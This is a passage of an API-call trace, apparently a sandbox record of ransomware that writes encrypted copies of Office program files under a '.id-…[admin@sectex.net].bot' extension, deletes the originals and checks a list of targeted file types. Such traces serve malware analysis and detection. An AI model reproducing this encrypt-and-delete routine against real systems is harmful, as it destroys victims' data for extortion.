	[0146.093] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=100224) returned 1
	[0146.093] CloseHandle (hObject=0x3ac) returned 1
	[0146.093] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.REST.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grintl32.rest.idx_dll")) returned 0x20
	[0146.115] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.REST.IDX_DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grintl32.rest.idx_dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0146.126] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.REST.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grintl32.rest.idx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0146.127] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.128] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.128] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.REST.IDX_DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grintl32.rest.idx_dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0146.128] GetLastError () returned 0x0
	[0146.128] ReadFile (in: hFile=0x3d4, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x18780, lpOverlapped=0x0) returned 1
	[0146.134] WriteFile (in: hFile=0x3ac, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x18790, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x18790, lpOverlapped=0x0) returned 1
	[0146.136] ReadFile (in: hFile=0x3d4, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0146.137] WriteFile (in: hFile=0x3ac, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xfe, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xfe, lpOverlapped=0x0) returned 1
	[0146.137] SetEndOfFile (hFile=0x3ac) returned 1
	[0146.137] CloseHandle (hObject=0x3ac) returned 1
	[0146.137] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.137] SetEndOfFile (hFile=0x3d4) returned 1
	[0146.140] CloseHandle (hObject=0x3d4) returned 1
	[0146.140] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.REST.IDX_DLL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0146.141] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.REST.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grintl32.rest.idx_dll")) returned 1
	[0146.141] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.REST.IDX_DLL") returned 69
	[0146.141] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.REST.IDX_DLL") returned 69
	[0146.141] lstrlenW (lpString=".doc") returned 4
	[0146.141] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1
	[0146.141] lstrlenW (lpString=".docx") returned 5
	[0146.141] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1
	[0146.141] lstrlenW (lpString=".pdf") returned 4
	[0146.141] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1
	[0146.141] lstrlenW (lpString=".xls") returned 4
	[0146.141] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1
	[0146.141] lstrlenW (lpString=".xlsx") returned 5
	[0146.141] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1
	[0146.141] lstrlenW (lpString=".ppt") returned 4
	[0146.141] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1
	[0146.141] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.REST.IDX_DLL") returned 69
	[0146.141] lstrlenW (lpString=".zip") returned 4
	[0146.141] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1
	[0146.142] lstrlenW (lpString=".rar") returned 4
	[0146.142] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1
	[0146.142] lstrlenW (lpString=".bz2") returned 4
	[0146.142] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1
	[0146.142] lstrlenW (lpString=".7z") returned 3
	[0146.142] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0146.142] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.REST.IDX_DLL") returned 69
	[0146.142] lstrlenW (lpString=".dbf") returned 4
	[0146.142] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1
	[0146.142] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.REST.IDX_DLL") returned 69
	[0146.142] lstrlenW (lpString=".1cd") returned 4
	[0146.142] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1
	[0146.142] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.REST.IDX_DLL") returned 69
	[0146.142] lstrlenW (lpString=".jpg") returned 4
	[0146.142] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1
	[0146.142] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.REST.IDX_DLL") returned 69
	[0146.142] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.REST.IDX_DLL") returned 69
	[0146.142] lstrlenW (lpString=".doc") returned 4
	[0146.142] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1
	[0146.142] lstrlenW (lpString=".docx") returned 5
	[0146.142] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1
	[0146.142] lstrlenW (lpString=".pdf") returned 4
	[0146.142] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1
	[0146.142] lstrlenW (lpString=".xls") returned 4
	[0146.142] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1
	[0146.142] lstrlenW (lpString=".xlsx") returned 5
	[0146.142] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1
	[0146.142] lstrlenW (lpString=".ppt") returned 4
	[0146.142] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1
	[0146.142] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.REST.IDX_DLL") returned 69
	[0146.142] lstrlenW (lpString=".zip") returned 4
	[0146.142] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1
	[0146.142] lstrlenW (lpString=".rar") returned 4
	[0146.142] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1
	[0146.143] lstrlenW (lpString=".bz2") returned 4
	[0146.143] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1
	[0146.143] lstrlenW (lpString=".7z") returned 3
	[0146.143] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0146.143] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.REST.IDX_DLL") returned 69
	[0146.143] lstrlenW (lpString=".dbf") returned 4
	[0146.143] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1
	[0146.143] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.REST.IDX_DLL") returned 69
	[0146.143] lstrlenW (lpString=".1cd") returned 4
	[0146.143] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1
	[0146.143] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.REST.IDX_DLL") returned 69
	[0146.143] lstrlenW (lpString=".jpg") returned 4
	[0146.143] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1
	[0146.143] lstrcmpiW (lpString1=".HXS", lpString2=".bot") returned 1
	[0146.143] lstrlenW (lpString="INFOPATH.HXS") returned 12
	[0146.143] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath.hxs"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0146.143] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=1527046) returned 1
	[0146.144] CloseHandle (hObject=0x3d4) returned 1
	[0146.144] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath.hxs")) returned 0x20
	[0146.144] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH.HXS.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath.hxs.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0146.144] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath.hxs"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0146.144] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.144] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.144] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH.HXS.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath.hxs.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0146.145] GetLastError () returned 0x0
	[0146.145] ReadFile (in: hFile=0x3d4, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0xffff0, lpOverlapped=0x0) returned 1
	[0146.169] WriteFile (in: hFile=0x3ac, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xffff0, lpOverlapped=0x0) returned 1
	[0146.187] ReadFile (in: hFile=0x3d4, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x74d16, lpOverlapped=0x0) returned 1
	[0146.359] WriteFile (in: hFile=0x3ac, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x74d20, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x74d20, lpOverlapped=0x0) returned 1
	[0146.370] ReadFile (in: hFile=0x3d4, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0146.370] WriteFile (in: hFile=0x3ac, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0146.370] SetEndOfFile (hFile=0x3ac) returned 1
	[0146.470] CloseHandle (hObject=0x3ac) returned 1
	[0146.470] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.470] SetEndOfFile (hFile=0x3d4) returned 1
	[0147.338] CloseHandle (hObject=0x3d4) returned 1
	[0147.338] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH.HXS.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.364] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath.hxs")) returned 1
	[0147.381] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH.HXS") returned 60
	[0147.381] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH.HXS") returned 60
	[0147.381] lstrlenW (lpString=".doc") returned 4
	[0147.381] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1
	[0147.381] lstrlenW (lpString=".docx") returned 5
	[0147.381] lstrcmpiW (lpString1=".docx", lpString2="H.HXS") returned -1
	[0147.381] lstrlenW (lpString=".pdf") returned 4
	[0147.381] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1
	[0147.381] lstrlenW (lpString=".xls") returned 4
	[0147.381] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1
	[0147.381] lstrlenW (lpString=".xlsx") returned 5
	[0147.381] lstrcmpiW (lpString1=".xlsx", lpString2="H.HXS") returned -1
	[0147.382] lstrlenW (lpString=".ppt") returned 4
	[0147.382] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1
	[0147.382] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH.HXS") returned 60
	[0147.382] lstrlenW (lpString=".zip") returned 4
	[0147.382] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1
	[0147.382] lstrlenW (lpString=".rar") returned 4
	[0147.382] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1
	[0147.382] lstrlenW (lpString=".bz2") returned 4
	[0147.382] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1
	[0147.382] lstrlenW (lpString=".7z") returned 3
	[0147.382] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1
	[0147.382] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH.HXS") returned 60
	[0147.382] lstrlenW (lpString=".dbf") returned 4
	[0147.382] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1
	[0147.382] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH.HXS") returned 60
	[0147.382] lstrlenW (lpString=".1cd") returned 4
	[0147.382] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1
	[0147.382] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH.HXS") returned 60
	[0147.382] lstrlenW (lpString=".jpg") returned 4
	[0147.382] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1
	[0147.382] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH.HXS") returned 60
	[0147.382] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH.HXS") returned 60
	[0147.382] lstrlenW (lpString=".doc") returned 4
	[0147.382] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1
	[0147.382] lstrlenW (lpString=".docx") returned 5
	[0147.382] lstrcmpiW (lpString1=".docx", lpString2="H.HXS") returned -1
	[0147.382] lstrlenW (lpString=".pdf") returned 4
	[0147.382] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1
	[0147.382] lstrlenW (lpString=".xls") returned 4
	[0147.382] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1
	[0147.382] lstrlenW (lpString=".xlsx") returned 5
	[0147.383] lstrcmpiW (lpString1=".xlsx", lpString2="H.HXS") returned -1
	[0147.383] lstrlenW (lpString=".ppt") returned 4
	[0147.383] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1
	[0147.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH.HXS") returned 60
	[0147.383] lstrlenW (lpString=".zip") returned 4
	[0147.383] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1
	[0147.383] lstrlenW (lpString=".rar") returned 4
	[0147.383] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1
	[0147.383] lstrlenW (lpString=".bz2") returned 4
	[0147.383] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1
	[0147.383] lstrlenW (lpString=".7z") returned 3
	[0147.383] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1
	[0147.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH.HXS") returned 60
	[0147.383] lstrlenW (lpString=".dbf") returned 4
	[0147.383] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1
	[0147.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH.HXS") returned 60
	[0147.383] lstrlenW (lpString=".1cd") returned 4
	[0147.383] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1
	[0147.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH.HXS") returned 60
	[0147.383] lstrlenW (lpString=".jpg") returned 4
	[0147.383] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1
	[0147.383] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0147.383] lstrlenW (lpString="MERES.DLL") returned 9
	[0147.383] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MERES.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\meres.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0147.417] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=1052592) returned 1
	[0147.417] CloseHandle (hObject=0x3b0) returned 1
	[0147.417] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MERES.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\meres.dll")) returned 0x20
	[0147.417] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MERES.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\meres.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.417] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MERES.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\meres.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0147.417] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MERES.DLL") returned 57
	[0147.418] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MERES.DLL") returned 57
	[0147.418] lstrlenW (lpString=".doc") returned 4
	[0147.418] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0147.418] lstrlenW (lpString=".docx") returned 5
	[0147.418] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1
	[0147.418] lstrlenW (lpString=".pdf") returned 4
	[0147.418] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0147.418] lstrlenW (lpString=".xls") returned 4
	[0147.418] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0147.418] lstrlenW (lpString=".xlsx") returned 5
	[0147.418] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1
	[0147.418] lstrlenW (lpString=".ppt") returned 4
	[0147.418] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0147.418] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MERES.DLL") returned 57
	[0147.418] lstrlenW (lpString=".zip") returned 4
	[0147.418] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0147.418] lstrlenW (lpString=".rar") returned 4
	[0147.418] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0147.418] lstrlenW (lpString=".bz2") returned 4
	[0147.418] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0147.418] lstrlenW (lpString=".7z") returned 3
	[0147.418] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0147.418] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MERES.DLL") returned 57
	[0147.418] lstrlenW (lpString=".dbf") returned 4
	[0147.418] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0147.418] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MERES.DLL") returned 57
	[0147.418] lstrlenW (lpString=".1cd") returned 4
	[0147.418] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0147.418] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MERES.DLL") returned 57
	[0147.418] lstrlenW (lpString=".jpg") returned 4
	[0147.418] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0147.419] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MERES.DLL") returned 57
	[0147.419] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MERES.DLL") returned 57
	[0147.419] lstrlenW (lpString=".doc") returned 4
	[0147.419] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0147.419] lstrlenW (lpString=".docx") returned 5
	[0147.419] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1
	[0147.419] lstrlenW (lpString=".pdf") returned 4
	[0147.419] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0147.419] lstrlenW (lpString=".xls") returned 4
	[0147.419] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0147.419] lstrlenW (lpString=".xlsx") returned 5
	[0147.419] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1
	[0147.419] lstrlenW (lpString=".ppt") returned 4
	[0147.419] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0147.419] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MERES.DLL") returned 57
	[0147.419] lstrlenW (lpString=".zip") returned 4
	[0147.419] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0147.419] lstrlenW (lpString=".rar") returned 4
	[0147.419] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0147.419] lstrlenW (lpString=".bz2") returned 4
	[0147.419] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0147.419] lstrlenW (lpString=".7z") returned 3
	[0147.419] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0147.419] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MERES.DLL") returned 57
	[0147.419] lstrlenW (lpString=".dbf") returned 4
	[0147.419] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0147.419] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MERES.DLL") returned 57
	[0147.419] lstrlenW (lpString=".1cd") returned 4
	[0147.419] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0147.419] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MERES.DLL") returned 57
	[0147.419] lstrlenW (lpString=".jpg") returned 4
	[0147.419] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0147.420] lstrcmpiW (lpString1=".VRD", lpString2=".bot") returned 1
	[0147.420] lstrlenW (lpString="MOVE.VRD") returned 8
	[0147.420] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOVE.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\move.vrd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0147.468] GetFileSizeEx (in: hFile=0x398, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=1420) returned 1
	[0147.468] CloseHandle (hObject=0x398) returned 1
	[0147.472] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOVE.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\move.vrd")) returned 0x20
	[0147.551] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOVE.VRD.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\move.vrd.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0148.090] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOVE.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\move.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0148.090] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.090] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.090] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOVE.VRD.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\move.vrd.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0148.192] GetLastError () returned 0x0
	[0148.192] ReadFile (in: hFile=0x3c0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x58c, lpOverlapped=0x0) returned 1
	[0148.284] WriteFile (in: hFile=0x388, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x590, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x590, lpOverlapped=0x0) returned 1
	[0148.285] ReadFile (in: hFile=0x3c0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0148.285] WriteFile (in: hFile=0x388, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xe4, lpOverlapped=0x0) returned 1
